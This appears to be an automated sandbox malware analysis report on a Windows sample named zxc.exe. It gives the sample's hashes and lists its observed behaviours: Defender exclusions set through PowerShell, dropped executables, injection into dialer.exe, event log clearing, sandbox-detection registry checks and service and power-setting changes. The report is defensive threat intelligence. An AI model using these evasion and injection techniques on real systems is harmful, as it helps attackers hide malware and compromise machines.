Analysis
-
max time kernel
1800s -
max time network
1794s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-11-2024 19:36
Static task
static1
Behavioral task
behavioral1
Sample
zxc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
zxc.exe
Resource
win7-20241010-en
Behavioral task
behavioral3
Sample
zxc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
zxc.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral5
Sample
zxc.exe
Resource
win11-20241023-en
General
-
Target
zxc.exe
-
Size
6KB
-
MD5
1037e4868002ea28986b067e602219d5
-
SHA1
eb606ee00af1c8e3982d827819feb020e552602e
-
SHA256
cc938a7173b4bf5863d698d322be43378d520bdea430a390496b016c85410706
-
SHA512
4924969ef9398f3a45ada5dfbaeab93d92d761100fd174075b53fbfe116738b31bc338a904a102631a7239ee8f82b8bd3ca222053385fb686820ef543ea6e183
-
SSDEEP
96:TH79mNb60qvjnMmt3VI9dXlO5NzO6M8Ac/h6zanF3d3oj4rl:P9gqvjn3QdXlWNzOH8Ac/hT3d/
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 1668 powershell.exe 8 1668 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 704 powershell.exe 4740 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
zxc.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation zxc.exe -
Executes dropped EXE 2 IoCs
Processes:
xdwd.exeUpdater32.exepid process 2052 xdwd.exe 1812 Updater32.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 3540 powercfg.exe 1784 powercfg.exe 4992 powercfg.exe 4888 powercfg.exe 5044 powercfg.exe 348 powercfg.exe 4248 powercfg.exe 1240 powercfg.exe -
Drops file in System32 directory 12 IoCs
Processes:
svchost.exeOfficeClickToRun.exepowershell.exeUpdater32.exexdwd.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe xdwd.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
xdwd.exeUpdater32.exedescription pid process target process PID 2052 set thread context of 3148 2052 xdwd.exe dialer.exe PID 1812 set thread context of 1156 1812 Updater32.exe dialer.exe PID 1812 set thread context of 2544 1812 Updater32.exe dialer.exe PID 1812 set thread context of 560 1812 Updater32.exe dialer.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4712 sc.exe 1780 sc.exe 1696 sc.exe 4632 sc.exe 4128 sc.exe 884 sc.exe 2364 sc.exe 4308 sc.exe 2904 sc.exe 4164 sc.exe 2904 sc.exe 4748 sc.exe 388 sc.exe 1152 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 63 IoCs
Processes:
powershell.exeOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 21 Nov 2024 19:51:28 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732218687" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={96D533AC-157F-4C60-9416-4DFFA36B90DD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Modifies registry class 1 IoCs
Processes:
sihost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exexdwd.exepowershell.exedialer.exeUpdater32.exepowershell.exedialer.exepid process 1668 powershell.exe 1668 powershell.exe 2052 xdwd.exe 704 powershell.exe 704 powershell.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 3148 dialer.exe 3148 dialer.exe 2052 xdwd.exe 2052 xdwd.exe 2052 xdwd.exe 3148 dialer.exe 3148 dialer.exe 1812 Updater32.exe 4740 powershell.exe 4740 powershell.exe 3148 dialer.exe 3148 dialer.exe 4740 powershell.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 4740 powershell.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 3148 dialer.exe 1812 Updater32.exe 1812 Updater32.exe 1812 Updater32.exe 3148 dialer.exe 3148 dialer.exe 1812 Updater32.exe 1812 Updater32.exe 3148 dialer.exe 3148 dialer.exe 1812 Updater32.exe 1812 Updater32.exe 1812 Updater32.exe 1812 Updater32.exe 1812 Updater32.exe 1812 Updater32.exe 1812 Updater32.exe 1156 dialer.exe 1156 dialer.exe 1812 Updater32.exe 3148 dialer.exe 3148 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exexdwd.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exedescription pid process Token: SeDebugPrivilege 1668 powershell.exe Token: SeIncreaseQuotaPrivilege 1668 powershell.exe Token: SeSecurityPrivilege 1668 powershell.exe Token: SeTakeOwnershipPrivilege 1668 powershell.exe Token: SeLoadDriverPrivilege 1668 powershell.exe Token: SeSystemProfilePrivilege 1668 powershell.exe Token: SeSystemtimePrivilege 1668 powershell.exe Token: SeProfSingleProcessPrivilege 1668 powershell.exe Token: SeIncBasePriorityPrivilege 1668 powershell.exe Token: SeCreatePagefilePrivilege 1668 powershell.exe Token: SeBackupPrivilege 1668 powershell.exe Token: SeRestorePrivilege 1668 powershell.exe Token: SeShutdownPrivilege 1668 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeSystemEnvironmentPrivilege 1668 powershell.exe Token: SeRemoteShutdownPrivilege 1668 powershell.exe Token: SeUndockPrivilege 1668 powershell.exe Token: SeManageVolumePrivilege 1668 powershell.exe Token: 33 1668 powershell.exe Token: 34 1668 powershell.exe Token: 35 1668 powershell.exe Token: 36 1668 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeIncreaseQuotaPrivilege 704 powershell.exe Token: SeSecurityPrivilege 704 powershell.exe Token: SeTakeOwnershipPrivilege 704 powershell.exe Token: SeLoadDriverPrivilege 704 powershell.exe Token: SeSystemProfilePrivilege 704 powershell.exe Token: SeSystemtimePrivilege 704 powershell.exe Token: SeProfSingleProcessPrivilege 704 powershell.exe Token: SeIncBasePriorityPrivilege 704 powershell.exe Token: SeCreatePagefilePrivilege 704 powershell.exe Token: SeBackupPrivilege 704 powershell.exe Token: SeRestorePrivilege 704 powershell.exe Token: SeShutdownPrivilege 704 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeSystemEnvironmentPrivilege 704 powershell.exe Token: SeRemoteShutdownPrivilege 704 powershell.exe Token: SeUndockPrivilege 704 powershell.exe Token: SeManageVolumePrivilege 704 powershell.exe Token: 33 704 powershell.exe Token: 34 704 powershell.exe Token: 35 704 powershell.exe Token: 36 704 powershell.exe Token: SeDebugPrivilege 2052 xdwd.exe Token: SeDebugPrivilege 3148 dialer.exe Token: SeShutdownPrivilege 1240 powercfg.exe Token: SeCreatePagefilePrivilege 1240 powercfg.exe Token: SeShutdownPrivilege 348 powercfg.exe Token: SeCreatePagefilePrivilege 348 powercfg.exe Token: SeShutdownPrivilege 4248 powercfg.exe Token: SeCreatePagefilePrivilege 4248 powercfg.exe Token: SeShutdownPrivilege 5044 powercfg.exe Token: SeCreatePagefilePrivilege 5044 powercfg.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4740 powershell.exe Token: SeIncreaseQuotaPrivilege 4740 powershell.exe Token: SeSecurityPrivilege 4740 powershell.exe Token: SeTakeOwnershipPrivilege 4740 powershell.exe Token: SeLoadDriverPrivilege 4740 powershell.exe Token: SeSystemtimePrivilege 4740 powershell.exe Token: SeBackupPrivilege 4740 powershell.exe Token: SeRestorePrivilege 4740 powershell.exe Token: SeShutdownPrivilege 4740 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
zxc.exepowershell.execmd.exexdwd.exedialer.exelsass.exedescription pid process target process PID 1664 wrote to memory of 1668 1664 zxc.exe powershell.exe PID 1664 wrote to memory of 1668 1664 zxc.exe powershell.exe PID 1668 wrote to memory of 2052 1668 powershell.exe xdwd.exe PID 1668 wrote to memory of 2052 1668 powershell.exe xdwd.exe PID 2212 wrote to memory of 240 2212 cmd.exe wusa.exe PID 2212 wrote to memory of 240 2212 cmd.exe wusa.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 2052 wrote to memory of 3148 2052 xdwd.exe dialer.exe PID 3148 wrote to memory of 628 3148 dialer.exe winlogon.exe PID 3148 wrote to memory of 692 3148 dialer.exe lsass.exe PID 3148 wrote to memory of 972 3148 dialer.exe svchost.exe PID 692 wrote to memory of 2960 692 lsass.exe sysmon.exe PID 3148 wrote to memory of 408 3148 dialer.exe svchost.exe PID 692 wrote to memory of 2960 692 lsass.exe sysmon.exe PID 3148 wrote to memory of 712 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 992 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1028 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1056 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1088 3148 dialer.exe dwm.exe PID 3148 wrote to memory of 1124 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1180 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1312 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1396 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1476 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1484 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1492 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1604 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1624 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1684 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1756 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1764 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1896 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2016 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1172 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1408 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 1600 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2116 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2216 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2292 3148 dialer.exe spoolsv.exe PID 3148 wrote to memory of 2404 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2568 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2688 3148 dialer.exe sihost.exe PID 3148 wrote to memory of 2696 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2764 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2772 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2824 3148 dialer.exe taskhostw.exe PID 3148 wrote to memory of 2860 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2916 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2960 3148 dialer.exe sysmon.exe PID 3148 wrote to memory of 2984 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 2992 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 3060 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 3252 3148 dialer.exe unsecapp.exe PID 3148 wrote to memory of 3544 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 3632 3148 dialer.exe Explorer.EXE PID 3148 wrote to memory of 3756 3148 dialer.exe svchost.exe PID 3148 wrote to memory of 4044 3148 dialer.exe RuntimeBroker.exe PID 3148 wrote to memory of 4120 3148 dialer.exe RuntimeBroker.exe PID 3148 wrote to memory of 4352 3148 dialer.exe DllHost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1088
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1312
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2824
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1484
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1624
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2688
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2216
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
